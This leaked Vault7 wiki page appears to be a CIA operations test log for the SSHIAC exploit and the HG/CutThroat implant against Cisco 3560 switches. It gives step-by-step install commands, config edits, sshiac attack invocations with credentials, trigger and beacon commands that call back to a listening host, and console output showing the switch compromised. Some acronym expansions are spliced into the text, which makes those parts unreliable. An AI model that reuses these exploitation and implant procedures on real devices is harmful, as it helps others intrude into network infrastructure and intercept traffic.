Vault7: CIA Hacking Tools Revealed
Navigation: » Latest version
Owner: User #1179928
JQJSlasher - Ops Testing
Cisco - 3560 IP:192.168.200.10
ICON-CT: 172.20.12.29 / Seeds Host 192.168.32.10 - VLAN32
Testing to focus on the following capabilities:
- Install
- Trigger
- Shell access
- MITM iFrame injectionSmoke Test Install / Functionality test to 24 Port 356
- Install HG (no AAASecurity Server from Cisco) / Set up basic comms with implant
- Un-tar delivery to ICON: /home/user1/slasher-2h_20150725/bin/ops/slasher-2h/
- Change ../slasher-2h/remote/data/config/npc3/target.py interPacketTime to 0.1 seconds
- nano ../ops/slash/slasher-2h/hg/slasher-2h.txt
- Change Interface = eth0
- Change Trigger address = 192.168.32.10 (Seeds host)
- Attack w/ SSHIAC from ICON: ./sshiac --ip 192.168.200.10:22 --l cisco:cisco password
-
LG
EC -125
DH
EC -60EC -159
M
-
- #cd ../../remote/
- source aliaeses
- remote>broad
- ./seq set 1
- remote>broad = GOOD - status OK
- nano target-aliases
- Change target ip = 192.168.200.10
- ProcID = 0x10423185
- Ran: ../slasher-2h/hg# ./prep-ct.sh
- = "File copy complete. CutThroat is ready for use."
- remote>hg_start
- = done, GOOD - status OK
- Result: 0xfffffffb (on 3560-24 #1 - stopped testing and tried 2nd switch from step 5)
- Result: 0x00000001 (on 2nd 3560-24)
- Make listen window:
- ./cutthroat ilm_hg.so
- ilm listen slasher-2h.txt
- Make trigger window:
- ./cutthroat ilm_hg.so
- ilm trigger slasher-2h.txt
- beacon call_base_back https 172.20.12.29 443
- SSL Handshake completes in listen window
-
Test basic functionality of initial install
- In listen window> modeule show
- = All modules running after initial install
- = All commands tab out
- In listen window> modeule show
-
Test HG Install with AAASecurity Server from Cisco configured similar to target device
- Configure 3560 with AAASecurity Server from Cisco settings from target config
- Save config and reload 3560 target to start with a clean switch
- Test ssh to confirm AAASecurity Server from Cisco works natively:
- ssh -l root 192.168.200.10
- password: password
- >en = password
- = successful login
- ssh -l root 192.168.200.10
- Attack with SSHIAC
-
./sshiac --ip 192.168.200.10:22 --l root:password password
LG
EC -122
E gs failed
E
-
./sshiac -c --ignor --ip 192.168.200.10:22 --l root:password password
-
BUILD NUMBER: SSH-415-P
username: larry
password: password
enable: password
IP: 192.168.200.10:22
ignore loggingpress ENTER to continue or Ctrl-c to stop
LG
EC -122
E gs failed
E
-
./sshiac -v -d --forceenable --confirm --ignorelog --ip 192.168.200.10:22 --l root:password password
-
./sshiac --ip 192.168.200.10:22 --l root:password password
BUILD NUMBER: SSH-415-P
username: root
password: password
enable: password
IP: 192.168.200.10:22
verbose
debug
force enable mode
ignore logging
press ENTER to continue or Ctrl-c to stop
L
3560-target>
3560-target>
3560-target>en
Password:
3560-target#term len 0x0
3560-target#term width 0
3560-target#show proc | i Virtual Exec|SSH
89 M* 0 378 171 2210 9728/12000 1 SSHSecure Shell Process
270 Mwe 12EAAE4 25 36 694 5040/6000 0 SSHSecure Shell Event handle
3560-target#
3560-target>
3560-target>
3560-target>en
Password:
3560-target#show region
Command authorization failed.
3560-target#term len 0
3560-target#show proc | i Virtual Exec|SSH
89 ME 2462A4 496 172 2883 9728/12000 1 SSHSecure Shell Process
266 M* 0 370 169 2189 9724/12000 2 SSHSecure Shell Process
270 Mwe 12EAAE4 25 36 694 5040/6000 0 SSHSecure Shell Event handle
3560-target#Gshow users | i \*
* 2 vty 1 root idle 00:00:00 172.20.12.29
3560-target#show ver | i IOS\ |BOOTLDR:
Cisco IOSApple operating system for small devices Software, C3560 Software (C3560-ADVIPSERVICESK9-M), Version 12.2(37)SE, RELEASE SOFTWARE (fc2)
BOOTLDR: C3560 Boot Loader (C3560-HBOOT-M) Version 12.2(44)SE5, RELEASE SOFTWARE (fc1)
3560-target#show stacks 266
Command authorization failed.
3560-target#
EC -122
E gs failed
exitexit
E
**********************************************************************
Thursday 8/6/15 - User #77408 Testing
*Unsure where exactly where User #? left off, reloaded the 3560, attempted to re-attack
- SSHIAC attack
- Result w/no flags:
ttack/linux$ ls sshiac user1@slasher-icon:~/slasher-2h_20150725/bin/ops/slasher/slasher-2h/attack/linux$ ./sshiac --ip 192.168.200.10:22 -l cisco:cisco password L ECEdgeCase -76
EC -129 E user1@slasher-icon:~/slasher-2h_20150725/bin/ops/slasher/slasher-2h/attack/linux$
-
Result with flags:
user1@slasher-icon:~/slasher-2h_20150725/bin/ops/slasher/slasher-2h/attack/linux$ ./sshiac -v -d --forceenable --confirm --ignorelog --ip 192.168.200.10:22 -l cisco:cisco password BUILD NUMBER: SSH-415-P
username: cisco password: cisco enable: password IP: 192.168.200.10:22 verbose debug force enable mode ignore logging
press ENTER to continue or Ctrl-c to stop
L ECEdgeCase -76
EC -129 E
-
Result when not being stupid and using the right username / password:
root@slasher-icon:/home/user1/slasher-2h_20150725/bin/ops/slasher/slasher-2h/attack/linux# ./sshiac -v -d --forceenable --ignorelog --ip 192.168.200.10:22 --l root:password password BUILD NUMBER: SSH-415-P
username: root password: password enable: password IP: 192.168.200.10:22 verbose debug force enable mode ignore logging
press ENTER to continue or Ctrl-c to stop
EC -60
EC -159 exit M
- Result w/no flags:
-
Successfully used Remote to install HG:
-
Set sequence number and broad: [target:192.168.200.10] remote> ./seq set 1 608 -> 1 [target:192.168.200.10] remote> broad
-
GOOD - status OK. OP: BROADCAST Target NEXT -->2<-- IACInternational Access Code Software Version 41.5 (Arch: PPCPowerPC (IBM)) Target Software (C3560-ADVIPSERVICESK9-M), Version 12.2(37)SE
Proc ID: 0x10423191 Next Sequence: 0x2
-
-
[target:192.168.200.10] remote> hg_start
GOOD - status OK. OP: RUNCODE using Per Second Code address: 0x03287d98 No data Result: 0x00000001
-
- NOTE - Recreated User #?'s steps 6-8 from above, no need to list it all out